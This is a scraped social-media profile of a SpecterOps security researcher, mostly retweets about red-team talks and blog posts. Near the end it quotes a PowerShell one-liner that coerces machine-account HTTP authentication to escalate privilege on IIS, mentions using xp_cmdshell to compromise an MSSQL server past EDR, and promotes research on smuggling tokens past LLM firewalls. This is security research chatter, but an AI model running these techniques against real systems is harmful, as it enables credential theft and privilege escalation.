
Garrett
@unsigned_sh0rt
Followers
1K
Following
3K
Media
120
Statuses
1K
Research at @SpecterOps
Portland, OR
Joined August 2009
RT @G0ldenGunSec: Azure Arc is Microsoft's solution for managing on-premises systems in hybrid environments. My new blog covers how it can….
0
61
0
RT @SpecterOps: In the year since Misconfiguration Manager's release, the security community has been actively researching new tradecraft &….
0
33
0
RT @subat0mik: Thanks to everyone who attended our (@unsigned_sh0rt) talk at @WEareTROOPERS! Here is the companion blog post: https://t.c….
0
22
0
RT @SpecterOps: Are you at #TROOPERS25? Don't miss @subat0mik & @unsigned_sh0rt's follow-up to their talk last year, providing an update on….
0
5
0
RT @Jonas_B_K: I publish two blog posts today! 📝🐫 . The first dives into how we're improving the way BloodHound models attack paths through….
0
68
0
RT @SpecterOps: This is your reminder to join @Jonas_B_K's talk happening soon at #TROOPERS25! Hear how security boundaries become attack h….
0
6
0
RT @SpecterOps: Did you catch Misconfiguration Manager: Overprivileged & Overlooked at #TROOPERS24? . @subat0mik & @unsigned_sh0rt will be….
0
7
0
Really enjoyed hearing your initial thoughts behind this one start to finish. great work @_xpn_ !.
🚨 New blog post alert!. @_xpn_ drops knowledge on LLM security w/ his latest post showing how attackers can by pass LLM WAFs by confusing the tokenization process to smuggle tokens to back-end LLMs.
0
2
11
Friend recently used this trick posted by @M4yFly to pop a MSSQL box on a non-evasive using xp_cmdshell since EDR was being annoying. It made me curious if there were other ways to trigger HTTP auth for priv esc.
Did you know you didn't need to use a potatoes exploit to going from iis apppool account to admin or system ?. Simply use: .powershell iwr http://192.168.56.1 -UseDefaultCredentials .To get an HTTP coerce of the machine account. 👇🧵
1
24
131